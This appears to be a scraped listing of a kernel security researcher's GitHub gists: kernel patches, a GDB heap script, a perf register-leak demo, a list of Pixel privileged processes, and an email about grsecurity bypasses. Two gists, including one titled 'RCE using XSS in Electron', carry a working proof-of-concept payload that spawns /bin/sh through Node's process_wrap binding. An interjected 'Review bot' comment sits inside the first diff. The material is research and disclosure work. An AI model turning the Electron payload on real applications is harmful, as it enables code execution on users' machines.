@thejh
thejh / gist:c91f9b4e3cc4c58659bb3cd056c4fa40
Created Aug 24, 2018
overzealous kasan stack fixup patch (completely untested)
View gist:c91f9b4e3cc4c58659bb3cd056c4fa40
diff --git a/arch/x86/entry/entry_64.S b/arch/x86/entry/entry_64.S
index 957dfb693ecc..251ed2ca3f04 100644
--- a/arch/x86/entry/entry_64.S
+++ b/arch/x86/entry/entry_64.S
@@ -1673,9 +1673,26 @@ ENTRY(rewind_stack_do_exit)
/* Prevent any naive code from trying to unwind to our caller. */
xorl %ebp, %ebp
+ movq %rdi, %r14
+
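Review bot: the hunk is cut off in this preview (the header announces 17 added lines but only `+ movq %rdi, %r14` is visible), so the later use of %r14 cannot be reviewed here. Parking the first argument (%rdi) in a callee-saved register before the stack is rewound is only safe if nothing between this point and the consumer clobbers %r14; the remaining lines of the hunk should be checked for that, and the comment above the `xorl %ebp, %ebp` should be extended to say why the argument is being preserved.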
@thejh
thejh / gdb-anaheap.py
Created Jul 29, 2018
GDB script for checking memory usage of completely unused pages in free glibc malloc chunks
View gdb-anaheap.py
import os
import struct
import gdb  # GDB's Python API; this script only runs inside gdb
# flags are encoded into chunk size
FLAGS_MASK = 0x7
PAGEMAP_PRESENT = 1<<63
PAGEMAP_SWAPPED = 1<<62
main_arena = gdb.parse_and_eval('&main_arena')
bins_per_arena = int(gdb.parse_and_eval(
@thejh
thejh / check.c
Created Jul 29, 2018
unused stack memory experiment
View check.c
// small stack memory usage experiment
// written by Jann Horn
#include <stdint.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <stdlib.h>
View gist:b8be219d48084630ec0aed41ee71aee2
0x0 Twux 0x7aa7000
0x0 Twux 0x8b4bf000
0x400000 Twux 0x77c9000
0x400000 P-ux 0x11f46000
0x600000 Twux 0x72da000
0x600000 P-u- 0x11f47000L
0x601000 Pwu- 0x11ec8000L
0x1e00000 Twux 0x79fb000
0x1f13000 Pwu- 0x11f7a000L
0x1f14000 Pwu- 0x11f7b000L
@thejh
thejh / perf_sample_regs_intr_demo.c
Created Nov 2, 2016
PERF_SAMPLE_REGS_INTR demo
View perf_sample_regs_intr_demo.c
$ ./perf_sample_regs_intr_demo
data_head is at ff0
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0x4005b0
rax=0xfffffffffffffff7 rbp=0xffffa5fc43efff48 rsp=0xffffa5fc43efff28 rip=0xffffffff97c55f1d
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0xffff8fc3ba3b79c0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef0 rip=0xffffffff97c745c9
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0x0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef8 rip=0xffffffff97c75049
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce15
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040c0 rip=0x4007d5
@thejh
thejh / gist:6a943fbbd89f81ffa28060dd4f60b390
Created Oct 29, 2016
privileged processes on pixel phones
View gist:6a943fbbd89f81ffa28060dd4f60b390
init root allcaps
ueventd root allcaps
logd CAP_AUDIT_CONTROL CAP_SYSLOG
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
debuggerd root allcaps
debuggerd64 root allcaps
vold root allcaps
debuggerd64:sig root allcaps
debuggerd:sig root allcaps
View gist:3bac7b2c79cdaaf569c702d9080320ed
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
View 0001-drivers-tty-add-protected_ttys-sysctl.patch
From cd0bd8ae7e4afb8050657b73d65e3ddeccd44b9b Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Sat, 12 Dec 2015 02:59:28 +0100
Subject: [PATCH] drivers/tty: add protected_ttys sysctl
This new fs.protected_ttys sysctl can be set to 1 to require
CAP_SYS_ADMIN for the TIOCSTI ioctl (which lets the caller
push input back into the TTY and thereby fake input to other
processes that read from the same TTY).
@thejh
thejh / rce.js
Created Aug 24, 2016
RCE using XSS in Electron
View rce.js
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
View GRKERNSEC_PTRACE_READEXEC bypasses
Date: Sun, 28 Feb 2016 19:08:22 +0100
From: Jann Horn <jann@thejh.net>
To: Brad Spengler <spender@grsecurity.net>
Subject: GRKERNSEC_PTRACE_READEXEC bypasses
Hi!
While writing some new kernel documentation (not yet public, but will probably
soon be under Documentation/security/ptrace_checks.txt), I noticed that
GRKERNSEC_PTRACE_READEXEC has some issues.